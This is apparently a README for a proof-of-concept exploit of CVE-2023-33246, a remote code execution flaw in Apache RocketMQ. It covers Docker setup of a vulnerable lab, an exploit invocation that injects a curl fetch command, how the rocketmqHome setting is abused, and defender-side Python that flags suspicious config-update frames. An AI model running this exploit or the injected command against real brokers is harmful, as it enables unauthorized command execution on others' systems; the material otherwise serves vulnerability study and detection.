# CVE-2023-33246: Apache RocketMQ Remote Code Execution
## OVERVIEW
Apache RocketMQ is one of the most popular and widely used distributed messaging and streaming platforms.
A command execution vulnerability has recently been reported in Apache RocketMQ affecting version 5.1.0 and below. A remote, unauthenticated user can exploit it through the update-configuration function to execute commands with the same access level as the RocketMQ user process.
## Essential Components
### Nameserver:
1. The nameserver in RocketMQ acts as a registry or metadata store for the entire messaging infrastructure.
2. It maintains information about topics, queues, and the brokers responsible for handling messages.
3. Clients (producers and consumers) use the nameserver to discover the brokers that they need to communicate with for publishing or consuming messages.
4. The nameserver is responsible for dynamic routing, load balancing, and failover within the RocketMQ cluster.
5. It listens on a specific port (usually port 9876 by default) for incoming requests from clients and brokers.
### Broker:
1. Brokers are the workhorses of the RocketMQ system, responsible for storing and managing messages.
2. Each broker manages one or more topics, which are logical channels for message communication.
3. Producers publish messages to specific topics, and consumers subscribe to topics to receive messages.
4. Brokers handle message storage, replication, and delivery to consumers based on subscriptions and message consumption patterns.
5. They maintain message queues for each topic-partition, ensuring efficient message processing and delivery.
6. Brokers communicate with nameservers to register themselves, update metadata, and participate in the cluster's routing and load balancing mechanisms.
## Environment Setup
Set up a local RocketMQ environment via Docker:
```
docker pull apache/rocketmq:4.9.4
### Start nameserver
docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
### Start Broker
docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
```
## Usage examples
### 1. Version Check
With the default configuration, the cluster starts accepting client connections on TCP port 9876. For example, below is a sample exchange between a client and the server to fetch the RocketMQ version:
```
python3 check.py --ip 127.0.0.1 --port 9876
```

**PCAP**

### 2. Exploit analysis
The UpdateBrokerConfig() function is invoked when the broker receives a request whose RequestCode is 25 (UPDATE_BROKER_CONFIG):
```
python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 127.0.0.1 10911 curl 127.0.0.1/exp
```

**PCAP**

We use the "rocketmqHome" server configuration option found in the broker.conf file. This option sets the value of the environment variable ROCKETMQ_HOME within the RocketMQ user process. By carefully crafting this value, we can execute commands of our choosing.

This is how the vulnerability works.
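As an added defender-side example (not part of this PoC or of the RocketMQ project), the following Python decodes a RocketMQ remoting frame and flags UPDATE_BROKER_CONFIG (code 25) requests that arrive from an unexpected source or touch rocketmqHome. The frame layout (4-byte total length, 4-byte word holding the serialize type and header length, JSON header, key=value body) is assumed from the public protocol; the sample frame, config values and source addresses are constructed.

```python
import json
import struct

UPDATE_BROKER_CONFIG = 25  # RocketMQ RequestCode.UPDATE_BROKER_CONFIG
SENSITIVE_KEYS = {"rocketmqHome"}  # keys whose remote change always alerts

def parse_frame(data: bytes):
    """Decode one RocketMQ remoting frame into (JSON header dict, body bytes).
    Layout: 4-byte total length | 4-byte word (top byte = serialize type,
    0 = JSON; low 24 bits = header length) | header | body."""
    if len(data) < 8:
        raise ValueError("frame too short")
    total_len, hdr_word = struct.unpack(">II", data[:8])
    serialize_type, header_len = hdr_word >> 24, hdr_word & 0x00FFFFFF
    if serialize_type != 0:
        raise ValueError("only JSON-serialized headers are handled here")
    frame_end = 4 + total_len  # total length excludes its own 4 bytes
    if frame_end > len(data) or 8 + header_len > frame_end:
        raise ValueError("truncated frame")
    header = json.loads(data[8:8 + header_len].decode("utf-8"))
    return header, data[8 + header_len:frame_end]

def parse_properties(body: bytes) -> dict:
    """The body of an UPDATE_BROKER_CONFIG request is 'key=value' lines."""
    props = {}
    for line in body.decode("utf-8", errors="replace").splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props

def inspect_frame(data: bytes, src: str, trusted_admins=()) -> list:
    """Return alert strings for one frame (empty list if nothing suspicious)."""
    header, body = parse_frame(data)
    if header.get("code") != UPDATE_BROKER_CONFIG:
        return []
    alerts = []
    if src not in trusted_admins:
        alerts.append(f"UPDATE_BROKER_CONFIG from unexpected source {src}")
    for key, value in parse_properties(body).items():
        if key in SENSITIVE_KEYS:
            alerts.append(f"config update touches {key}={value!r}")
    return alerts

def constructed_sample(code=UPDATE_BROKER_CONFIG,
                       body=b"rocketmqHome=/opt/rocketmq\nbrokerName=broker-a\n"):
    """Constructed test frame (not captured traffic); benign values only."""
    header = json.dumps({"code": code, "language": "JAVA", "version": 0,
                         "opaque": 1, "flag": 0, "extFields": {}}).encode()
    return struct.pack(">II", 4 + len(header) + len(body), len(header)) + header + body
```

In practice the same check can be run over frames reassembled from a capture of broker port 10911 traffic, with `trusted_admins` set to the hosts that legitimately run `mqadmin updateBrokerConfig`.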
File snapshot
[4.0K] /data/pocs/22bddbc7817e22d721f7d73a0e7a245657a021b2
├── [ 16K] check.py
├── [1.3K] CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py
└── [3.7K] README.md
0 directories, 3 files